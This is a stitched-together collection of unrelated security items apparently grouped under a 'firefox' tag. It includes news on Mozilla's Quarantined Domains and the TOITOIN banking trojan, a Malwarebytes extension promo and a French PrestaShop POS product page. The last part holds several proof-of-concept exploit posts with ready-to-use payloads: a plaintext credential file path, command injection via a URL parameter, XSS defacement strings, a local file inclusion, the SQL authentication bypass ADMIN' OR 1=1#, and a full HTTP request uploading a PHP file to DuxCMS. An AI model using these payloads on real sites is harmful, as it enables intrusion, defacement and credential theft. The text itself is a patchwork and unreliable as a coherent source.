Mozilla has announced that some add-ons may be blocked from running on certain sites as part of a new feature called Quarantined Domains.
"We have introduced a new back-end feature to only allow some extensions monitored by Mozilla to run on specific websites for various reasons, including security concerns," the company said in its Release Notes for Firefox 115.0 released last week.
The company

Mozilla has announced that some add-ons may be blocked from running on certain sites as part of a new feature called **Quarantined Domains**.

"We have introduced a new back-end feature to only allow some extensions monitored by Mozilla to run on specific websites for various reasons, including security concerns," the company said in its Release Notes for Firefox 115.0 released last week.

The company said the openness afforded by the add-on ecosystem could be exploited by malicious actors to their advantage.

"This feature allows us to prevent attacks by malicious actors targeting specific domains when we have reason to believe there may be malicious add-ons we have not yet discovered," Mozilla said in a separate support document.

Users are expected to have more control over the setting for each add-on, starting with Firefox version 116. That said, it can be disabled by loading "about:config" in the address bar and setting "extensions.quarantinedDomains.enabled" to false.

The development adds to Mozilla's existing capability to remotely disable individual extensions that pose a risk to user privacy and security.

It's worth noting that the warning appears in the Extensions popup rather than on the Extensions icon in the current implementation, as a result of which the alerts are not displayed should an add-on be pinned to the toolbar.

"It turns out that when you pin an extension to the toolbar, it no longer appears in the Extensions popup!," security researcher and add-on developer Jeff Johnson noted.

"Consequently, the quarantined domains warning no longer appears in the Extensions popup either. In fact, there's no longer an Extensions popup: clicking the Extensions toolbar icon simply opens the about:addons page, which doesn't show the quarantined domains warning anywhere."

UPCOMING WEBINAR

🔐 Privileged Access Management: Learn How to Conquer Key Challenges

Discover different approaches to conquer Privileged Account Management (PAM) challenges and level up your privileged access security strategy.

Reserve Your Spot

"This is a terrible user interface design for the new so-called 'security' feature, silently disabling extensions while hiding the warning from the user," Johnson added.

Mozilla has said that it intends to improve the user experience in future releases, although it did not give a definitive timeline.

The change also comes as Mozilla decried a browser-based website blocking proposal put forth by France that would require browser vendors to establish mechanisms to mandatorily block websites present on a government-provided list to tackle online fraud.

"Such a move will overturn decades of established content moderation norms and provide a playbook for authoritarian governments that will easily negate the existence of censorship circumvention tools," the company said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Mozilla Feature Blocks Risky Add-Ons on Specific Websites to Safeguard User Security

Businesses operating in the Latin American (LATAM) region are the target of a new Windows-based banking trojan called TOITOIN since May 2023.
"This sophisticated campaign employs a trojan that follows a multi-staged infection chain, utilizing specially crafted modules throughout each stage," Zscaler researchers Niraj Shivtarkar and Preet Kamal said in a report published last week.
"These modules

Enterprise Security / Malware

Businesses operating in the Latin American (LATAM) region are the target of a new Windows-based banking trojan called **TOITOIN** since May 2023.

"This sophisticated campaign employs a trojan that follows a multi-staged infection chain, utilizing specially crafted modules throughout each stage," Zscaler researchers Niraj Shivtarkar and Preet Kamal said in a report published last week.

"These modules are custom designed to carry out malicious activities, such as injecting harmful code into remote processes, circumventing User Account Control via COM Elevation Moniker, and evading detection by Sandboxes through clever techniques like system reboots and parent process checks."

The six-stage endeavor has all the hallmarks of a well-crafted attack sequence, beginning with a phishing email containing an embedded link that points to a ZIP archive hosted on an Amazon EC2 instance to evade domain-based detections.

The email messages leverage an invoice-themed lure to trick unwitting recipients into opening them, thereby activating the infection. Within the ZIP archive is a downloader executable that's engineered to set up persistence by means of an LNK file in the Windows Startup folder and communicate with a remote server to retrieve six next-stage payloads in the form of MP3 files.

The downloader is also responsible for generating a Batch script that restarts the system after a 10-second timeout. This is done so as to "evade sandbox detection since the malicious actions occur only after the reboot," the researchers said.

Included among the fetched payloads is "icepdfeditor.exe," a valid signed binary by ZOHO Corporation Private Limited, which, when executed, sideloads a rogue DLL ("ffmpeg.dll") codenamed the Krita Loader.

The loader, for its part, is designed to decode a JPG file downloaded alongside the other payloads and launch another executable known as the InjectorDLL module that reverses a second JPG file to form what's called the ElevateInjectorDLL module.

The InjectorDLL component subsequently moves to inject ElevateInjectorDLL into the "explorer.exe" process, following which a User Account Control (UAC) bypass is carried out, if required, to elevate the process privileges and the TOITOIN Trojan is decrypted and injected into the "svchost.exe" process.

UPCOMING WEBINAR

🔐 Privileged Access Management: Learn How to Conquer Key Challenges

Discover different approaches to conquer Privileged Account Management (PAM) challenges and level up your privileged access security strategy.

Reserve Your Spot

"This technique allows the malware to manipulate system files and execute commands with elevated privileges, facilitating further malicious activities," the researchers explained.

TOITOIN comes with capabilities to gather system information as well as harvest data from installed web browsers such as Google Chrome, Microsoft Edge and Internet Explorer, Mozilla Firefox, and Opera. Furthermore, it checks for the presence of Topaz Online Fraud Detection (OFD), an anti-fraud module integrated into banking platforms in the LATAM region.

The nature of the responses from the command-and-control (C2) server is presently not known due to the fact that the server is no longer available.

"Through deceptive phishing emails, intricate redirect mechanisms, and domain diversification, the threat actors successfully deliver their malicious payload," the researchers said. "The multi-staged infection chain observed in this campaign involves the use of custom-developed modules that employ various evasion techniques and encryption methods."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New TOITOIN Banking Trojan Targeting Latin American Businesses

Categories: Personal
Tags: Malwarebytes

Tags:  Browser Guard

Tags:  Premium

Tags:  new features

Malwarebytes Browser Guard introduces three new features: Content control, import & export, and historical detection statistics



(Read more...)




The post Malwarebytes Browser Guard introduces three new features appeared first on Malwarebytes Labs.

Malwarebytes Browser Guard is our free browser extension for Chrome, Edge, Firefox, and Safari that blocks unwanted and unsafe content, giving users a safer and faster browsing experience. It's the world’s first browser extension to do this while also identifying and stopping tech support scams. 

An often heard misconception is that people think they don’t need Browser Guard since they already have Malwarebytes Premium or a firewall, but since Browser Guard comes in the form of a browser extension it can offer protection to the browser that other means of protection do not have access to.

This is also true the other way around: It can only protect the browsers that have it installed as an extension. It can’t protect other parts of the system or other applications. So while there is an overlap, you need both to optimize protection.

**New features**

The Malwarebytes engineers have been hard at work to make Browser Guard even better, and we can now announce three new features for Premium users:

*   Content Control: With this, you can dial up your control of your browsing experience and define what’s appropriate for you. Fully customize the content you want to block while you - or your kids - are browsing.
*   Import and Export: Use your preferences and customized rules with all your browsers, even on other devices. This helps you to experience a consistent and clean web experience. Discover on this video how to transfer Malwarebytes Browser Guard settings to another browser.
*   Historical Detection Statistics: View past detections and see what we’ve protected you from.  

 

Please note that these new features are only available for Windows systems.

Malwarebytes Browser Guard introduces three new features

SQL injection vulnerability found in PrestaShop lekerawen_ocs before v.1.4.1 allow a remote attacker to gain privileges via the KerawenHelper::setCartOperationInfo, and KerawenHelper::resetCheckoutSessionData components.

*   Logiciel de caisse
*   Site web e-commerce
*   Pilotage de l’activité
*   Outils marketing
*   Outils de communication
*   DÉMO

Avec le **logiciel de caisse PrestaShop**, votre caisse enregistreuse dépasse les frontières physiques de votre magasin et devient le centre névralgique de votre activité. Avec le module KerAwen, vous possédez tous les outils et informations vous permettant de proposer une offre personnalisée à chacun de vos clients, mais aussi de bien gérer vos stocks. En plus, la **caisse enregistreuse** compatible Prestashop peut vous suivre partout pour renseigner votre clientèle en magasin ou réaliser un encaissement « sofa ».

Le logiciel de caisse PrestaShop Kerawen est **conforme et certifié** avec la nouvelle norme 2018.

Notre caisse Pos KerAwen est 100 % compatible avec un **site e-commerce** PrestaShop, mais elle l’est aussi avec d’autres CMS comme Shopify et WooCommerce.

_Logiciel de caisse prestashop intuitif, nomade et puissant.  
Offrez une nouvelle expérience à vos clients, réinventez le métier de vendeur._

**Module de caisse PrestaShop : un outil d’aide à la vente inédit**

*   *   *   **Comptes client** : création en quelques clics, reconnaissance des clients et visualisation immédiate de leur historique d’achats magasin, web et mobile. D’un simple clic, le vendeur peut consulter les articles vus sur son site e-commerce, la wishlist, le CA des 12 derniers mois, le panier moyen, les paniers abandonnés…

*   *   *   **Catalogue produits** : création, édition, modification et visualisation des fiches produit (prix, stocks, descriptifs, recommandations…)

*   *   *   **Marketing** : édition de _coupons promotionnels_, mise en place de programmes personnalisés de _fidélité_ et de _parrainage_

**Notre caisse PrestaShop est aussi un gestionnaire de commandes**

*   *    Notifications automatiques des commandes web sur la caisse

*   *   Gestion des commandes clients en temps réel (changement d’état et retrait en magasin)

*   *   Bientôt, la prise de commande avec choix entre retrait en magasin et livraison à domicile depuis la caisse

**Un logiciel de caisse PrestaShop lié à une technologie simple et économique**

*   *   *   **Conservez votre matériel informatique** : compatible avec les systèmes d’exploitation Windows, Mac, Linux… et avec tous les devices (ordinateurs, tablettes et téléphones mobiles), notre logiciel de caisse PrestaShop nécessite uniquement un navigateur (Firefox, Chrome, Safari, Opera). La solution KerAwen est aussi compatible avec les douchettes USB et les imprimantes supportant le protocole ESC/POS, soit la plupart des imprimantes du marché.

**Une caisse enregistreuse Prestashop avec les meilleures fonctionnalités**

Multi paiement : espèces, ticket-restaurant, carte-cadeau, carte, paiement différé…

Gestion des devis omni-canal : un devis créé en caisse peut être transformé en commande en ligne par votre client

Fidélité : compte commun au web et au magasin, transformation d’achat

Carte-cadeau omni-canal : une carte-cadeau vendue en magasin peut être utilisée sur le site ou vice versa

Ticket de caisse & facture : impression, envoi par e-mail et disponible en ligne

Remise catalogue ou vendeur (article ou panier)

Avoir : génération avec code-barres, utilisable en caisse ou en ligne, anonyme ou nominatif

Coupons : code-barres, automatique ou discrétionnaire vendeur

Clôture de caisse, dépôt et remise d’espèces

Journaux : CA, encaissement et TVA des points de fidélité en bons

Mise en attente et rappel panier

Afficheur client 2 lignes ou écran incluant photo publicité

Génération et impression des codes-barres

CVE-2023-27845: Logiciel de caisse PrestaShop, caisse enregistreuse POS

DANGEROUS MAILER-CLONED version 2.0 suffers from an information leakage vulnerability.

    ====================================================================================================================================| # Title     : DANGEROUS MAILER-CLONED V2.0 information disclosure Vulnerability                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : https://thefortune39.company.site/CLONED-VERSION-OF-DANGEROUS-MAILER-p199233403                                    || # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] all users and passwords saved as clear text[+] use payload : /storage/info.txt[+] login : /login.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

DANGEROUS MAILER-CLONED 2.0 Information Disclosure

DaillyTools suffers from a remote command execution vulnerability.

    ====================================================================================================================================| # Title     : DaillyTools v1 command execution Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://github.com/islamoc/DaillyTools                                                                              || # Dork      : Coded by Mennouchi Islam Azeddine                                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] infected file : PHP_Comments.php[+] Line : 20      Function Name : exec      Variables     :$arr[+] PHP_Comments.php?arr= pwd Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

DaillyTools Remote Command Execution

CakePHP Test Suite version 2.7.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : CakePHP Test Suite v2.7.0 Xss Vulnerability                                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : https://cakephp.org/                                                                                               |  | # Dork      : n/a                                                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] use payload in : <script>alert(/indoushka/);</script> or <marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] create new user and post comment or in search box use payload [+] http://127.0.0.1/forum.groupethika.com/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CakePHP Test Suite 2.7.0 Cross Site Scripting

Aplikasi Sistem Informasi Kelulusan CMS version 1.0.9 suffers from a local file inclusion vulnerability.

    ====================================================================================================================================| # Title     : Aplikasi Sistem Informasi Kelulusan CMS v 1.0.9 [ASIK] LFI Vulnerability                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : http://lulus.smkn2purwokerto.sch.id/admin.zip                                                                      |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] the infected file : index.php      <?php      require "config.php";       error_reporting(E_ALL ^ (E_NOTICE | E_WARNING));       $page=$_GET['page'];       $filename="content/$page.php";       if (!file_exists($filename))        {         include "content/home.php";        }            else        {@include "content/$page.php";}        ?>[+] LFI : /index.php?page= [Ev!l]====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

Aplikasi Sistem Informasi Kelulusan CMS 1.0.9 Local File Inclusion

AGVirtues Galeria version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : AGVirtues Galeria v2.0 Auth By Pass Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : https://codecanyon.net/                                                                                            || # Dork      : galeria/album.php?id=                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user & pass : ADMIN' OR 1=1#[+] http://wexpomarmorecombr/galeria/admin/album.php Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

AGVirtues Galeria 2.0 SQL Injection

File upload vulnerability in DuxCMS 2.1 allows attackers to execute arbitrary php code via duxcms/AdminUpload/upload.

**File type upload configuration**

Add php file type to it like this

**Upload file features**

then find one upload file features

the file is name shell.jpg and content like this.

Capturing data packets of uploaded files,and change the file suffix to php

and the packets is like this.

    POST /DuxCMS/admin.php?r=duxcms/AdminUpload/upload HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: http://127.0.0.1/DuxCMS/admin.php?r=article/AdminContent/add
    Content-Type: multipart/form-data; boundary=---------------------------191691572411478
    Content-Length: 853
    Connection: close
    Cookie: 042_sessid_ab46d60bfa95=2020-13-9np1-77uqd8wxh-a95a9743c; phpwcmsBELang=en; loader=loaded; _utcpl=17ad82836af704761d37d9a49a32770es1; __atuvc=3%7C2; PHPSESSID=u7oug0qsfdrqa6r1l5v2kr3noh
    
    -----------------------------191691572411478
    Content-Disposition: form-data; name="class_id"
    
    0
    -----------------------------191691572411478
    Content-Disposition: form-data; name="id"
    
    WU_FILE_0
    -----------------------------191691572411478
    Content-Disposition: form-data; name="name"
    
    shell.jpg
    -----------------------------191691572411478
    Content-Disposition: form-data; name="type"
    
    image/jpeg
    -----------------------------191691572411478
    Content-Disposition: form-data; name="lastModifiedDate"
    
    2020/1/8 ä¸å4:16:35
    -----------------------------191691572411478
    Content-Disposition: form-data; name="size"
    
    35
    -----------------------------191691572411478
    Content-Disposition: form-data; name="file"; filename="shell.php"
    Content-Type: image/jpeg
    
    <?php
    
    phpinfo();
    
    ?>
    -----------------------------191691572411478--
    
    

**Access file**

After getting the file uploaded above, the file address returned by the server.Successfully uploaded the php file and executed the php file.

**Solution**

delete this configuration features.

Tag

#firefox